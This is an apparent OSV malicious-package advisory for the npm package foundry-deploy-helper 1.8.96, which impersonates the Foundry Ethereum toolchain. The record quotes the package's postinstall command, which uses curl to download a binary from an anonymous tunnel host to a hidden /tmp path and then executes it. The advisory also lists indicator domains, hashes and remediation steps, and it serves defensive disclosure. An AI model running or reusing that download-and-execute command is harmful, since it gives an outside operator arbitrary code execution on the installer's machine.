{"id":"MAL-2026-4241","summary":"Malicious code in foundry-deploy-helper (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (14ad9106b013b6e68056e1afe40a833d89b1c2037aab7b67d4b24bba1dbf4c77)\npackage.json declares a postinstall hook that runs `node -e` with an inline child_process.execSync invoking `curl -fsSL rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link/npm/-/binary/telemetry -o /tmp/.node-cache && chmod +x /tmp/.node-cache && /tmp/.node-cache &`. On `npm install`, an unsigned, unpinned, opaque binary is downloaded from an anonymous Pinggy free-tunnel host (a mutable, throwaway tunnel endpoint unrelated to any legitimate publisher), staged to a hidden dotfile path `/tmp/.node-cache`, marked executable, and executed detached in the background with errors swallowed via try/catch. The package name `foundry-deploy-helper`, the fabricated repository URL `github.com/foundry/foundry-deploy-helper`, and the generic author `Web3 Developer Tools \u003cdev@foundry-tools.dev\u003e` impersonate the Foundry (foundry-rs) Ethereum toolchain to lure web3 developers into installing it. The fetch destination is not publisher-owned, the URL is not version-pinned, no hash or signature check is performed, the staging path is hidden, and the package's advertised purpose has no plausible reason to fetch and execute an arbitrary binary at install time. Installing this package gives the operator of the Pinggy tunnel arbitrary code execution on the installer's machine.\n\n## Source: ghsa-malware (f4774e2df818e6cfb7beaea8f0b59e770962373a3e1c3f7fb4b987bf9b8903cd)\nAny computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be rotated immediately from a different computer. The package should be removed, but as full control of the computer may have been given to an outside entity, there is no guarantee that removing the package will remove all malicious software resulting from installing it.\n","aliases":["GHSA-xhp8-r3hh-j47p"],"modified":"2026-05-26T06:02:33.200585903Z","published":"2026-05-20T00:08:34Z","database_specific":{"malicious-packages-origins":[{"import_time":"2026-05-22T03:24:54.648228302Z","source":"ghsa-malware","modified_time":"2026-05-22T02:42:59Z","sha256":"f4774e2df818e6cfb7beaea8f0b59e770962373a3e1c3f7fb4b987bf9b8903cd","ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"id":"GHSA-xhp8-r3hh-j47p"},{"import_time":"2026-05-26T05:50:24.047958414Z","versions":["1.8.96"],"source":"amazon-inspector","modified_time":"2026-05-20T00:08:34Z","sha256":"14ad9106b013b6e68056e1afe40a833d89b1c2037aab7b67d4b24bba1dbf4c77","id":"IN-MAL-2026-003310"},{"import_time":"2026-05-26T05:50:24.15761289Z","versions":["1.8.96"],"source":"amazon-inspector","modified_time":"2026-05-20T00:08:35Z","sha256":"c81314ceaccf35910c94f0238f54fa2ecbaf884cf6ebd51763dbf8e65c588e11","id":"IN-MAL-2026-003311"}]},"references":[{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-xhp8-r3hh-j47p"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/foundry-deploy-helper/v/1.8.96"}],"affected":[{"package":{"name":"foundry-deploy-helper","ecosystem":"npm","purl":"pkg:npm/foundry-deploy-helper"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"}]}],"versions":["1.8.96"],"database_specific":{"indicators":{"domains":["rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link","rqnyz-2605-7280-7--2000-c51.run.pinggy-free.link.ec2.internal"],"package_integrity":[{"filename":"foundry-deploy-helper-1.8.96.tgz","hashes":{"sha512_sri":"sha512-lvvsU5OLp43HvGSAdh6mGo8LW0258ZZmgtZ9sc5FdehD5iUosiXJm1rAVe97rgwbNZrQGhpw6JiWKpby7+TIpw==","sha1":"3deac880c78d79f2815e764b0bd27677225e4d4c"}}],"evidence_files":[{"tlsh":"e201104ce0284c7708e00bb9586e0191be6284034f40b808b397403dc39e6aad9fecd8","path":"package.json","sha256":"e6c9c1732256e81e4cc39dcab5104023ca0bf084e1491abdf3ef8e07bfccfa98"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/foundry-deploy-helper/MAL-2026-4241.json"}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com"],"type":"FINDER"}]}